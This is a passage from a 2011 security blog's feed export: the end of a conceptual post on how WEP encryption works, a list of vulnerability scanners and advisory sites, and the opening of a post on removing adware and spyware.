using RC4, which is a stream cipher. This cipher is then initialized with a seed 
value, so thta it can generate a keystream, which is just a arbitrarily long 
stream of pseudo-random bytes. WEP basically uses an initialization vector (IV) for the 
seed value. The IV consists of 24 bytes of varied bits that is generated for 
each packet. Some older WEP implementations simply use sequential values for the 
IV, while others use some form of pseudo-randomizer.&lt;/div&gt;
&lt;div class="para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="para"&gt;
Regardless of how the 24 bits of IV are chosen, they are prepended 
to the WEP key. The 24 bits of IV are included in the WEP key size in a bit of 
clever marketing spin. (When a vendor talks about 64-bit or 128-bit WEP keys, 
the actual keys are only 40 bits and 104 bits, respectively, with 24 bits of 
IV.) The IV and the WEP key together make up the seed value, which will be 
called &lt;i class="emphasis"&gt;S&lt;/i&gt;.&lt;/div&gt;
&lt;div class="para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="informalfigure" style="text-align: center;"&gt;
&lt;span class="figuremediaobject"&gt;&amp;nbsp;&lt;/span&gt;&lt;a href="http://1.bp.blogspot.com/-wSVFH4KRxa0/TsGHhwfBtpI/AAAAAAAAA0E/z5CO9q74wHw/s1600/1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="129" src="http://1.bp.blogspot.com/-wSVFH4KRxa0/TsGHhwfBtpI/AAAAAAAAA0E/z5CO9q74wHw/s320/1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="informalfigure"&gt;
&lt;span class="figuremediaobject"&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="informalfigure"&gt;
&lt;span class="figuremediaobject"&gt;&lt;a href="http://draft.blogger.com/images/figu212%5F2%5F0%2Ejpg" name="IMG_25" target="_parent"&gt;&amp;nbsp;&lt;/a&gt;&lt;/span&gt; 
&lt;/div&gt;
&lt;div class="para"&gt;
&lt;a href="" name="311"&gt;&lt;/a&gt;&lt;a href="" name="page213"&gt;&lt;/a&gt;Then the seed value &lt;i class="emphasis"&gt;S&lt;/i&gt; is fed into RC4, which will generate a keystream. This 
keystream is XORed with the plaintext message &lt;i class="emphasis"&gt;P&lt;/i&gt;, to 
produce the ciphertext &lt;i class="emphasis"&gt;C&lt;/i&gt;. The IV is prepended to the 
ciphertext, and the whole thing is encapsulated with yet another header and sent 
out over the radio link.&lt;/div&gt;
&lt;div class="informalfigure"&gt;
&lt;span class="figuremediaobject"&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="informalfigure"&gt;
&lt;span class="figuremediaobject"&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="informalfigure"&gt;
&lt;div style="text-align: center;"&gt;
&lt;span class="figuremediaobject"&gt;&lt;a href="http://draft.blogger.com/images/figu213%5F1%5F0%2Ejpg" name="IMG_26" target="_parent"&gt;&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;a href="http://2.bp.blogspot.com/-5BgjUdlMCa8/TsGHiZteVdI/AAAAAAAAA0I/K76bkAuJRYM/s1600/3.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="159" src="http://2.bp.blogspot.com/-5BgjUdlMCa8/TsGHiZteVdI/AAAAAAAAA0I/K76bkAuJRYM/s320/3.png" width="320" /&gt;&lt;/a&gt;&lt;a href="http://draft.blogger.com/images/figu213%5F1%5F0%2Ejpg" name="IMG_26" target="_parent"&gt;&lt;/a&gt;&lt;span class="figuremediaobject"&gt;&lt;a href="http://draft.blogger.com/images/figu213%5F1%5F0%2Ejpg" name="IMG_26" target="_parent"&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="para"&gt;
When the recipient receives a WEP-encrypted packet, the process is 
simply reversed. The recipient pulls the IV from the message and then 
concatenates the IV with his own WEP key to produce a seed value of &lt;i class="emphasis"&gt;S&lt;/i&gt;. If the sender and receiver both have the same WEP key, the 
seed values will be the same. This seed is fed into RC4 again to produce the 
same keystream, which is XORed with the rest of the encrypted message. This will 
produce the original plaintext message, which consisted of the packet message &lt;i class="emphasis"&gt;M&lt;/i&gt; concatenated with the integrity checksum &lt;i class="emphasis"&gt;CS&lt;/i&gt;. The recipient then uses the same CRC32 function to 
recalculate the checksum for &lt;i class="emphasis"&gt;M&lt;/i&gt; and checks to make sure the 
calculated value matches the received value of &lt;i class="emphasis"&gt;CS&lt;/i&gt;. If the 
checksums match, the packet is passed on. Otherwise there were too many 
transmission errors or the WEP keys didn't match, and the packet is dropped.&lt;/div&gt;
&lt;div class="para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="last-para"&gt;
That's basically WEP in a nutshell. Very soon i would write on What is the Logic when we are hacking a WEP key, which vulnerabilty do we exploit and so on so forth. The tutorial for hacking WEP has already been published by me.Would upload a video very soon too. :)&lt;/div&gt;
&lt;div class="last-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="last-para"&gt;
Have fun, and Enjoy hacking :)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-8169712453036753061?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/8169712453036753061/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/11/wep-in-nutshell.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/8169712453036753061?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/8169712453036753061?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/11/wep-in-nutshell.html' title='WEP In a Nutshell'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-zWuRazInxOY/Tos7op5YtHI/AAAAAAAABcg/-lu3ODc0lMU/s72-c/wep.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;D0UESX4yfCp7ImA9WhRSE00.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-6672308104461164749</id><published>2011-11-14T13:09:00.001-08:00</published><updated>2011-11-14T13:13:28.094-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-11-14T13:13:28.094-08:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='HackingZone'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilities'/><title>Tool Population For Vulnerability Assessment</title><content type='html'>&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://network-security.pdfen.com/files/2011/08/vulnerability-assessment-200.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="264" src="http://network-security.pdfen.com/files/2011/08/vulnerability-assessment-200.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.icsinc.com/Portals/0/icsimages/ICS-vulnerability-assessment.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;A vulnerability assessment tool or scanner is a tool using
which we can automate the process of testing loopholes in a network and
immunity of security system implemented by an organization.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;They can be classified as :&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpFirst" style="margin-left: 0.75in; text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;a.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Host&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.75in; text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;b.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Service&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast" style="margin-left: 0.75in; text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;c.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Application&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast" style="margin-left: 0.75in; text-indent: -0.25in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;Host based tools performs scanning on the system they resides
on, i.e. they do not interact with any other system. Their advantage include
having access to all system resources such as logs, etc. They also work a a faster
rate as compared to other assessment tools. However they can also take large
amount of host machine’s resources and if this was a important node in the
network, this can raise worries on network admin’s face.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;Service vulnerability scaners includes tools which scans a
range of host or particular services which are running on them. These can
include simple port scanners (Nmap, angryip, etc) and they can also include
completely automated programs (Acunetix, Nessus, GFI Languard)&amp;nbsp; which can detect live hosts and try to fetch
data from them. This automation can be in terms of banner grabbing or service
identification as well. These automated tools also enable users to create a
report on its own once it completes the assessment. &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;When we talk about current tool population in the industry,
there are a number of tools ranging from scanners to automated ones. Some of
them which are open source and available free of cost includes :&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Microsoft
Baseline Security Analyser ( http://microsoft.com/technets/security/tools/mbsahome.mspx)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Winfingerprint
(http://winfingerprint.com)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;OpenVas (&lt;/span&gt;&lt;a href="http://wald.intevation.org/projects/openvas/"&gt;&lt;span style="line-height: 115%;"&gt;http:/wald.intevation.org/projects/openvas/&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Paros (&lt;/span&gt;&lt;a href="http://parosproxy.org/"&gt;&lt;span style="line-height: 115%;"&gt;http://parosproxy.org&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Win Vuln Scan
(&lt;/span&gt;&lt;a href="http://pspl.com/download/winvulnscan.htm"&gt;&lt;span style="line-height: 115%;"&gt;http://pspl.com/download/winvulnscan.htm&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Nikto (&lt;/span&gt;&lt;a href="http://www.cirt.net/code/nikto.shtml"&gt;&lt;span style="line-height: 115%;"&gt;http://www.cirt.net/code/nikto.shtml&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Nessus&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast" style="text-indent: -0.25in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;Apart from these tools, you must be in touch with latest
vlnerbilty informations. For this purpose you can use these advisories :&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;a href="http://cert.org/"&gt;&lt;span style="line-height: 115%;"&gt;http://cert.org&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;a href="http://cve.mitre.org/cve"&gt;&lt;span style="line-height: 115%;"&gt;http://cve.mitre.org/cve&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;a href="http://isc.sans.org/"&gt;&lt;span style="line-height: 115%;"&gt;http://isc.sans.org&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;a href="http://owasp.org/"&gt;&lt;span style="line-height: 115%;"&gt;http://owasp.org&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;a href="http://osvdb.org/"&gt;&lt;span style="line-height: 115%;"&gt;http://osvdb.org&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;a href="http://seclists.org/"&gt;&lt;span style="line-height: 115%;"&gt;http://seclists.org&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;a href="http://secunia.com/"&gt;&lt;span style="line-height: 115%;"&gt;http://secunia.com&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Wingdings; line-height: 115%;"&gt;Ø&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;a href="http://exploit-db.com/"&gt;&lt;span style="line-height: 115%;"&gt;http://exploit-db.com&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-6672308104461164749?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/6672308104461164749/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/11/tool-population-for-vulnerability.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/6672308104461164749?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/6672308104461164749?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/11/tool-population-for-vulnerability.html' title='Tool Population For Vulnerability Assessment'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;DkQDQnkzcSp7ImA9WhRSE00.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-1358996203378457479</id><published>2011-11-14T12:52:00.001-08:00</published><updated>2011-11-14T12:59:33.789-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-11-14T12:59:33.789-08:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Virus Stuff'/><category scheme='http://www.blogger.com/atom/ns#' term='SystemZone'/><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips'/><category scheme='http://www.blogger.com/atom/ns#' term='SystemTricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Net Tricks'/><title>Getting Rid from Adwares and Spywares</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://clicktechnews.com/wp-content/uploads/2009/12/spyware-blockers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="285" src="http://clicktechnews.com/wp-content/uploads/2009/12/spyware-blockers.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class="fullpost" style="font-size: small;"&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://clicktechnews.com/wp-content/uploads/2009/12/spyware-blockers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;Do you consider yourself a smart Web Surfer or downloader? Do
you consider yourself immune to threat from spywares, known for tracking and
monitoring you silently. Then I must say you are not. To support this, let me
figure out some points-&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoListParagraphCxSpFirst" style="margin-left: 0.75in; text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;1.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Most
commonly they are installed on our system as a hidden program, behind something
legitimate which you had given permission. They may be in form of installation
programs, or drive by downloads, i.e. asking you for a plugin in order to view
a page.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.75in; text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;2.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Unlike
other programs, these spywares always work in stealth mode so that you can
never got to know about the program. You would not even see them in task
manager, in add/remove programs, etc.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast" style="margin-left: 0.75in; text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;3.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Popups,
unwanted websites, unknown errors, slower pc, are very clear indication of
spywares.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;Guess why someone would create adware or spywares? A simple
thought, they can send you unwanted ads for which they can be paid by the
companies thy advertise for, or they can report your name, email address, and
other information to a survey company.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;Now lets talk about the removal of adware. The methodology
which most of the adware/spyware removal tools use is similar to antiviruses.
They also maintain a library of spyware filenames and registry keys and then
searching and removing them from systems.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;However the first thing I would suggest you to install is a
firewall so that no one can get access to your system. This would even work in
the case when your system is already infected.&amp;nbsp;
In fact most of the operating systems nowadays comes with default
firewalls within them. Some other firewalls that may of your interest are :&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
